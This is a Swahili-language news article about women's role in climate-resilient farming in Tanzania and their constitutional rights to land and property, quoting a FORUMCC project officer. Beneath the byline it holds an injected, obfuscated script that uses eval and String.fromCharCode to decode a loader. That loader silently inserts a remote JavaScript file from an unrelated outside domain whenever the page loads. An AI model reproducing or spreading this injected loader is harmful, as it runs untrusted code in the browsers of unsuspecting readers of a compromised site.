Recent Comments

Kilimo himilivu kinachochea fursa na haki sawa za kiuchumi na kijamii kwa mwanamke

By Juma Issihaka Nov 30, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

IMEELEZWA kuwa wanawake ndiyo wahanga wakubwa wa athari za mabadiliko ya tabianchi katika sekta ya kilimo kutokana na ukweli kwamba, sehemu kubwa ya uzalishaji wa sekta hiyo hufanywa nao hususan katika nchi zinazoendelea.

Kwa mujibu wa takwimu za Umoja wa Mataifa (UN), asilimia 80 ya watu wanaolazimika kuhama makazi yao kutokana na mabadiliko ya tabianchi ni wanawake.

Utafiti huo unafafanua kuwa, hatua hiyo hufanywa kutokana na majukumu yao ya kila siku ambayo huwaweka katika mazingira hatari zaidi wakati wa majanga kama mafuriko, njaa na ukame.

Hata hivyo, upo utofauti mkubwa kati ya wanawake na wanaume katika madhara, hali ya hatari na namna wanavyoweza kukabiliana na mabadiliko ya tabianchi kulingana na uwezo wao wa kupata taarifa mbalimbali na nguvu ya kufanya maamuzi.

Kasumba ya kumuacha mwanamke nyuma iliyopo kwa miongoni mwa jamii nyingi nchini, kunamuibua Afisa Miradi wa Mtandao wa Kitaifa wa Asasi za Kiraia Zinazojihusisha na Masuala ya Mabadiliko ya Tabianchi (FORUMCC) Sarah Ngoy, ambaye anasema hali hiyo imejengeka zaidi katika nchi zinazoendelea.

Anasema kwa kipindi kirefu mwanamke amekua akiachwa nyuma katika masuala ya ushiriki wa kufanya maamuzi katika ngazi ya Kaya, kushiriki katika fursa mbalimbali za maendeleo, elimu ya fedha na ujasiriamali.

Sarah, anasema pia mwanamke amekuwa akiachwa nyuma katika utafutaji wa masoko ya bidhaa na ujasiri katika kutetea haki zao za msingi ikiwemo umiliki wa ardhi na mali nyingine.

Anasema hayo yote yanafanywa bila kuangalia kuwa mwanamke ndiye mzalishaji mkubwa katika sekta ya kilimo na kwamba wao ndiyo chachu ya maendeleo katika katika sekta hii.

Anafafanua kuwa ugumu wa shughuli za kilimo zinazofanywa na wanawake kuanzia kupanda, kupalilia hadi kuvuna zinaonyesha kiasi gani wanaathirika zaidi na athari za mabadiliko ya tabianchi.

“Kuna umuhimu wa kuangalia athari za mabadiliko ya tabianchi kwa wanawake sio tu kwa kuzingatia tabia za kiuchumi na kijamii bali pia kuzingatia kazi na majukumu yao katika shughuli maalumu za uzalishaji wa mazao yatokanayo na kilimo ama mifugo,” anasema.

Anashauri kutiliwa mkazo kwa kilimo himilivu katika nchi zinazoendela ikiwemo Tanzania ndiyo, msingi wa kuibua fursa za kuwasaidia wanawake kupunguza ugumu na mzigo wa kazi za kilimo kwao.

Kwa mujibu wa Sarah, ni vyema kuwepo kwa hamasa ya matumizi ya mbinu na teknolojia za kilimo himilivu ikiwa ni moja ya njia za kisasa katika kukabiliana na mabadiliko ya tabianchi.

Anabainisha kuwa imeshuhudiwa mara kadhaa kuwa matumizi ya mbinu na teknolojia hizo yanatoa suluhu la kuongeza tija na uzalishaji, usalama wa chakula na lishe, uhimilivu katika mifumo ya uzalishaji na kupunguza utoaji wa hewa ya ukaa.

“Mwanamke akijengewa mazingira wezeshi ya upokeaji au matumizi ya mbinu na teknolojia za kilimo himilivu itamsaidia kupunguza ugumu wa kazi za kilimo na kuongeza tija ili kupunguza pengo la kijinsia kati ya mwanamke na mwanaume kwa kuwa ushiriki wa mwanamke katika shughuli za kilimo ni mkubwa,” anasema.

Anasema suala la kuwawezesha wanawake rasilimali za uzalishaji, huduma za kifedha, maarifa, ajira nje ya kilimo na kujenga uwezo kwenye mbinu za kukabiliana na mabadiliko ya tabianchi ni miongoni mwa mambo ambayo pia yatasaidia kuwapunguzia ugumu wa shughuli hiyo na hatimae kupata muda mwingi wa kufanya shughuli nyingine za kiuchumi.

Sarah, anasema mchango wa mwanamke katika kuongeza tija kwenye kilimo na usalama wa chakula ni mkubwa katika jamii, lakini kinakwamisha kunufaika kwao ni kukosekana kwa fursa na haki sawa za kiuchumi na kijamii kama ilivyo kwa wanaume.

“Wanawake wanazalisha asilimia kubwa ya chakula Afrika katika mashamba madogomadogo ukilinganisha na wanaume, kazi ambayo ni ngumu mno,” anasema.

Anasema sababu ya hali hiyo ni upatikanaji finyu wa rasilimali kwa wanawake, kadhalika kukosekana kwa nafasi za kushiriki fursa za kimaendeleo na udhaifu katika kufanya maamuzi.

Sarah, anashauri ili kuendelea kwa sekta hiyo na kuhakikisha usalama wa chakula, lishe bora, kuondosha umasikini na kujenga ustahimilivu ni budi kuzingatiwa usawa wa wanawake katika rasilimali zote zenye tija ikiwemo ardhi.

Sarah, anafafanua kuwa Ibara ya 13 (1) ya Katiba ya Jamhuri ya Muungano wa Tanzania ya mwaka 1977 inasema watu wote ni sawa mbele ya sheria, na wanayo haki, bila ya ubaguzi wowote, kulindwa na kupata haki sawa mbele ya sheria, huku Ibara ya 12 (2) ikisema, kila mtu anastahili heshima ya kutambuliwa na kuthaminiwa utu wake.

Kulingana na Sarah Ibara ya 24 (1) inabainisha kuwa bila ya kuathiri masharti ya sheria za nchi zinazohusika, kila mtu anayo haki ya kumiliki mali, na haki ya hifadhi kwa mali yake aliyonayo kwa mujibu wa sheria.

Anasema kutokana na matakwa ya katiba, mwanamke anatambulika kuwa ni mtu, binadamu na raia, hivyo ni dhahiri kuwa katiba inatambua usawa na uhuru wa mwanamke na mwanaume.

“Katiba inatambua na kulinda haki ya mwanamke na mwanaume kumiliki mali ikiwemo ardhi,” anasema.

Kadhalika Sarah, anasema Katiba inakataza mwanamke au mwanaume kujiona bora au kupendelewa kuliko wengine, ambapo Kifungu cha 3 (2) cha sheria ya ardhi na sheria ya ardhi ya kijiji ya mwaka 1999 inasema, haki ya kila mwanamke kupata, kumiliki, kutumia na kuuza au kuigawa ardhi ifahamike kuwa ni sawa sawa na haki ya mwanaume yeyote kwa viwango vile vile na masharti yale yale.

Anashuri wanawake kupewa fursa za kumiliki mali na ardhi, pia wazidi kujengewa uwezo kuhusu sheria za ardhi na haki zao iliwajitambue na kutumia nafasi waliyopewa na sheria ya ardhi kuomba umiliki wa ardhi ambayo wataitumia katika kukuza uchumi wao.

“Wengi bado hawajui kwamba katiba na sheria vinatambua haki za mwanamke,” anasema.

Anasema FORUMCC kwa kushirikiana na PACJA (Pan African Climate Justice Alliance) kupitia utekelezaji wa mradi unaolenga kuongeza ushiriki wa asasi za kiraia (AZAKI) katika utekelezaji wa makubaliano ya Paris (Paris Agreement) ya mwaka 2015 na Malengo ya Maendeleo endelevu (SDGs) mpaka ifikapo mwaka 2030; wanatoa wito wa kuimarisha usawa wa kijinsia.

Anaongeza kuwa sambamba na hilo pia inatoa wito kwa uwepo wa mikakati mizuri ya kiutendaji inayohusisha maswala hayo katika mipango ya maendeleo kuanzia ngazi za vijiji mpaka ngazi ya Wilaya.

“Serikali kupitia wizara husika iweke mkazo wa kuweka usawa wa kijinsia katika masoko, rasilimali fedha, kujenga uwezo wa kufanya maamuzi, elimu, teknolojia na uwezeshaji wa wanawake ili waweze kuzalisha zaidi chakula na kuuza mazao yao ili kuzidi kujiinua kiuchumi kwasababu maendeleo ya uchumi katika sekta ya kilimo yanamuhitaji sana mwanamke, hasa mkulima mdogo,” anasema.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.